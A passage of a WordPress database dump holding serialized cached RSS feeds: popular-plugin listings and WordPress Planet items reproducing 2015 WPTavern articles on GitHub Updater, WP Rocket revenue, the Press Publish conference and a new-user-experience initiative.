Restoration\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/updraftplus/#post-38058\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 21 May 2012 15:14:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"38058@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Backup and restoration made easy. Complete backups; manual or scheduled (backup to S3, Dropbox, Google Drive, Rackspace, FTP, SFTP, email + others).\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Anderson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Advanced Custom Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/advanced-custom-fields/#post-25254\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Mar 2011 04:07:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"25254@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Customise WordPress with powerful, professional and intuitive fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"elliotcondon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"132@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Arne Brachhold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"NextGEN Facebook - Advanced Social SEO for Facebook, Google+, Pinterest, Twitter & More\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/nextgen-facebook/#post-40409\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Jul 2012 20:13:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"40409@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Display your content in the best possible way on Facebook, Google+, Twitter, Pinterest, etc. - no matter how your webpage is shared!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"JS Morisset\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/rss/view/popular\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:11:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Mon, 09 Feb 2015 22:26:15 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:7:\"expires\";s:29:\"Mon, 09 Feb 2015 22:43:09 GMT\";s:13:\"cache-control\";s:0:\"\";s:6:\"pragma\";s:0:\"\";s:13:\"last-modified\";s:31:\"Mon, 09 Feb 2015 22:08:09 +0000\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20130522182132\";}','no'),(751,'_transient_timeout_feed_867bd5c64f85878d03a060509cd2f92c','1423563974','no'),(752,'_transient_feed_867bd5c64f85878d03a060509cd2f92c','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: GitHub Updater 4.1 to Add Remote Installation for WordPress Plugins and Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38758\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"http://wptavern.com/github-updater-4-1-to-add-remote-installation-for-wordpress-plugins-and-themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3688:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/01/wpvsgithub.jpg\" rel=\"prettyphoto[38758]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/01/wpvsgithub.jpg?resize=1025%2C381\" alt=\"WordPress Versus Github\" class=\"aligncenter size-full wp-image-15216\" /></a></p>\n<p><a href=\"https://github.com/afragen/github-updater\" target=\"_blank\">GitHub Updater</a> is a plugin that developers often use to enable automatic updates to GitHub or Bitbucket-hosted WordPress plugins and themes. The project was started in July 2013 by <a href=\"http://thefragens.com/\" target=\"_blank\">Andy Fragen</a>, a trauma surgeon and plugin developer. Over the past two years GitHub Updater has received improvements from 14 <a href=\"https://github.com/afragen/github-updater/graphs/contributors\" target=\"_blank\">contributors</a>.</p>\n<p>Fragen’s work on GitHub Updater makes it possible for developers to stay in their <a href=\"http://wptavern.com/wordpress-org-vs-github-for-hosting-wordpress-plugins-and-themes\" target=\"_blank\">preferred GitHub/Bitbucket workflow</a> and still ship updates for plugins and themes to their users. After reading about how <a href=\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\" target=\"_blank\">WP Pusher is extending WordPress’ built-in auto updater to deploy remotely hosted themes and plugins</a>, Fragen was inspired to investigate the possibility of adding remote installation of WordPress extensions to his GitHub Updater.</p>\n<p>He now has the <code>develop</code> branch of the project working to successfully install both public and private GitHub or Bitbucket repositories remotely. “I must confess, the hardest part was getting everything in the Settings API functioning,” Fragen said.</p>\n<p>With the help of some code from the <a href=\"https://wordpress.org/plugins/zero-spam/\" target=\"_blank\">WordPress Zero Spam</a> plugin by Ben Marshall, and a few lines from <a href=\"http://tgmpluginactivation.com/\" target=\"_blank\">TGM Plugin Activation</a> by Thomas Griffin, he was able to get a tabbed settings interface in place in addition to the plugin dependency portion of the task.</p>\n<p>“After setting up the tabs in the Settings page I was able to simply create the correct endpoint for GitHub and Bitbucket,” Fragen said. “I thought allowing for private repository remote installation might prove more difficult but a couple of modifications in other parts of the plugin made this relatively painless. It certainly makes downloading a repo from GitHub, renaming it correctly, and then uploading it a single-click experience.”</p>\n<p><a href=\"https://github.com/afragen/github-updater\" target=\"_blank\">GitHub Updater</a> is <a href=\"https://github.com/afragen/github-updater/issues/34\" target=\"_blank\">not allowed in the WordPress.org directory</a>, as the guidelines forbid official plugins from allowing updates from anywhere outside of WordPress.org. Developers usually opt for using the GitHub Updater when they want to host their plugins on GitHub/Bitbucket, or need to provide updates for private repositories.</p>\n<p>The <a href=\"http://thefragens.com/2015/02/github-updater-and-remote-installation/\" target=\"_blank\">4.1 release of GitHub Updater</a> will include both remote installation and automatic updating in one package. If you want to test the functionality now, you can check out the <code>develop</code> branch. Feel free to log your issues and feedback on <a href=\"https://github.com/afragen/github-updater\" target=\"_blank\">GitHub</a>, as Fragen will be incorporating bug fixes into the 4.1 release.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 20:32:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: WP Rocket Grows From $0 to $35K in Monthly Revenue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38729\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"http://wptavern.com/wp-rocket-grows-from-0-to-35k-in-monthly-revenue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3984:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/WPRocketFeaturedImage.png\" rel=\"prettyphoto[38729]\"><img class=\"aligncenter size-full wp-image-38763\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/WPRocketFeaturedImage.png?resize=672%2C281\" alt=\"WP Rocket Featured Image\" /></a></p>\n<p>WP Media, the company behind WordPress caching plugin WP Rocket, <a title=\"http://blog.wp-rocket.me/transparency-matters/\" href=\"http://blog.wp-rocket.me/transparency-matters/\">published a post</a> that highlights how successful the plugin has been since launching a year and a half ago. When we wrote about the <a title=\"http://wptavern.com/wp-rocket-launches-commercial-caching-plugin-for-wordpress\" href=\"http://wptavern.com/wp-rocket-launches-commercial-caching-plugin-for-wordpress\">international launch of WP Rocket</a>, we questioned whether it would be able to compete against all of the free, robust options available.</p>\n<p>In a show of transparency, WP Media shares stats that indicate the plugin is doing well. Since launching a year and a half ago, WP Rocket has achieved the following milestones while being a 100% bootstrapped company:</p>\n<ul>\n<li>$0 to $35 000 in monthly revenue</li>\n<li>0 to +15 000 websites using WP Rocket</li>\n<li>0 to +4300 customers.</li>\n</ul>\n<p>Despite launching the product without a business plan, customers have shown they’re willing to buy a caching solution that’s simple to configure and use.</p>\n<p>Jean-Baptiste Marchand-Arvier, Co-founder of WP Rocket, says the move towards greater transparency is inspired by other companies that have revealed revenue numbers, recruitment strategies, and productivity tips.</p>\n<blockquote><p>We are really inspired by great companies like <a href=\"https://bufferapp.com/\">Buffer</a>, <a href=\"http://baremetrics.io\">Baremetrics</a> and <a href=\"https://mattermark.com/\">Mattermark</a> where transparency is a company culture. They share it through several channels:</p>\n<ul>\n<li><a href=\"https://open.bufferapp.com\">Buffer Open Blog</a>, “Our journey to greater productivity, more transparency and a happier work culture”</li>\n<li><a href=\"https://medium.com/@DanielleMorrill\">Medium posts of Danielle Morrill</a>, CEO and Cofounder of Mattermark</li>\n<li><a href=\"https://baremetrics.io/blog\">Baremetrics Blog</a></li>\n</ul>\n<p><strong>These companies have helped us greatly</strong> by sharing a lot of internal information including their monthly revenue, and more.</p></blockquote>\n<p>At the end of 2014, <a title=\"https://pippinsplugins.com/2014-review/\" href=\"https://pippinsplugins.com/2014-review/\">Easy Digital Downloads</a> and <a title=\"http://wpninjas.com/2014-review/\" href=\"http://wpninjas.com/2014-review/\">WP Ninjas</a> published year-end reviews that show how well each plugin has done. However, Matt Medeiros, of MattReport.com <a title=\"http://mattreport.com/precursor-greatness/\" href=\"http://mattreport.com/precursor-greatness/\">cautions,</a> that while reading about the success of others can be motivational, it can also be depressing.</p>\n<blockquote><p>Entrepreneurs or small business owners that have been in the game month-after-month or 3 years in still struggling to make it. “Everyone is doing better shit than me.” or “Look at the money they are making! Why can’t I?”</p>\n<p>The new social has amplified everyone else’s success while making yours seem insignificant.</p></blockquote>\n<p>I want to see as many companies as possible open up to their customers and readers by publishing revenue numbers and strategies that don’t work out as intended. Aside from knowing the numbers, I think a lot of people in the community would love to read about the struggles businesses are having and what they’re doing to overcome them.</p>\n<p>So far, WP Rocket is proving once again that, despite jumping into an established market, you can be successful if your product is better than the competition.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 20:21:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"WPTavern: The First Conference Dedicated to WordPress.com Debuts on March 28th in Portland, OR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38717\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"http://wptavern.com/the-first-conference-dedicated-to-wordpress-com-debuts-on-march-28th-in-portland-or\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2200:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/PressPublishFeaturedImage.png\" rel=\"prettyphoto[38717]\"><img class=\"size-full wp-image-38718\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/PressPublishFeaturedImage.png?resize=668%2C262\" alt=\"Press Publish Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/38072565@N00/462857539\">Publish Akku</a> – <a href=\"https://creativecommons.org/licenses/by-nc/2.0/\">(license)</a>\n<p>Those who use the <a title=\"https://wordpress.org/\" href=\"https://wordpress.org/\">self hosted version of WordPress</a> have access to <a title=\"http://central.wordcamp.org/\" href=\"http://central.wordcamp.org/\">WordCamps</a>, annual conferences dedicated to WordPress. Meanwhile, there has never been a conference focused on WordPress.com.</p>\n<p><a title=\"http://presspublish.events/\" href=\"http://presspublish.events/\">Press Publish</a> is a new <a title=\"http://presspublish.events/2015/02/04/portland-lineup-confirmed/\" href=\"http://presspublish.events/2015/02/04/portland-lineup-confirmed/\">series of events</a> focused on WordPress.com and Jetpack. The first is scheduled for <a title=\"http://presspublish.events/events/portland/\" href=\"http://presspublish.events/events/portland/\">March 28th, 2015 in Portland, OR</a>. There’s also a second event scheduled for <a title=\"http://presspublish.events/events/phoenix/\" href=\"http://presspublish.events/events/phoenix/\">April 18th, 2015 in Phoenix, AZ</a>.</p>\n<p>Each event lasts for one day and has two tracks. Speakers will share their personal success stories on using the WordPress.com platform. There will also be a handful of Automatticians on hand to answer any questions. Registration is open for both events and costs $250.00.</p>\n<p>Press Publish is an opportunity for attendees to learn from some of the brightest minds who make a living publishing content on WordPress.com. It’s also an opportunity for attendees to speak with Automatticians face to face to suggest features or enhancements to the service. The events and locations are part of a pilot program that, if successful, will likely spread to other places around the world.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 20:00:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Initiative Aims to Improve the New User Experience in WordPress 4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38655\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/initiative-aims-to-improve-the-new-user-experience-in-wordpress-4-2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4889:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/NewUserExperienceFeaturedImage.png\" rel=\"prettyphoto[38655]\"><img class=\"size-full wp-image-38713\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/NewUserExperienceFeaturedImage.png?resize=650%2C200\" alt=\"New User Experience Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/35034347371@N01/414920055\">zu.com – Image136</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>Drew Jaynes, who is <a title=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\" href=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\">leading the release cycle</a> for WordPress 4.2 <a title=\"https://make.wordpress.org/core/2015/02/05/4-2-community-initiative-nux-working-group/\" href=\"https://make.wordpress.org/core/2015/02/05/4-2-community-initiative-nux-working-group/\">announced on the Make.WordPress.core blog,</a> that a new community initiative has been launched called NUX or New User Experience. The group is made up of more than 15 members of the WordPress community who have experience in onboarding clients, training clients, and work with new users on a regular basis. According to the announcement, the group’s main task is as follows:</p>\n<blockquote><p>The group will be tasked with helping to identify common pain points new users might experience using WordPress. The hope is to (re)invigorate the conversation about making NUX a priority in core decision-making. We’ll work together to identify problems and recommend solutions.</p></blockquote>\n<p>With regards to 4.2, the group will brainstorm actionable goals and make recommendations to improve the new user experience throughout the WordPress backend. Jaynes says, “These changes would likely include improvements to contextual help on various screens, improvements to the content of the Welcome Panel, as well as adjustments to many other established workflows in core interfaces including the installation process.”</p>\n<p>Recommendations large and small will receive direct feedback from core developers. This provides an opportunity for new users to immediately contribute back to WordPress. The group’s first meeting will be held <a href=\"http://www.timeanddate.com/worldclock/fixedtime.html?iso=20150210T1900\"><abbr class=\"date\" title=\"2015-02-10T19:00:00+00:00\">Tuesday, February 10, 2015 14:00 UTC-5</abbr></a> in the <a href=\"https://wordpress.slack.com/messages/core-flow/\">#core-flow</a> channel on <a href=\"https://make.wordpress.org/chat\">Slack</a>.</p>\n<h2>Re-establishing Easy as a Selling Point</h2>\n<p>I’ve used WordPress since 2008 and one of its strongest selling points has always been that it’s easy to use. However, as WordPress has advanced, I think it’s become progressively more difficult to use. Within the last two years, several articles have highlighted the increasing difficulty in using and explaining WordPress.</p>\n<ul>\n<li><a title=\"http://mor10.com/wordpress-easy-thats-ok/\" href=\"http://mor10.com/wordpress-easy-thats-ok/\">WordPress is not easy – and that’s OK</a></li>\n<li><a title=\"https://medium.com/@salliegoetsch/have-we-been-misleading-people-about-wordpress-9dcd7dbf3034\" href=\"https://medium.com/@salliegoetsch/have-we-been-misleading-people-about-wordpress-9dcd7dbf3034\">Have We Been Misleading People about WordPress?</a></li>\n<li><a title=\"http://wptavern.com/why-is-explaining-wordpress-to-someone-so-hard\" href=\"http://wptavern.com/why-is-explaining-wordpress-to-someone-so-hard\">Why Is Explaining WordPress To Someone So Hard?</a></li>\n</ul>\n<p>I think a good base to start from to improve the user experience is Jen Mylo’s <a 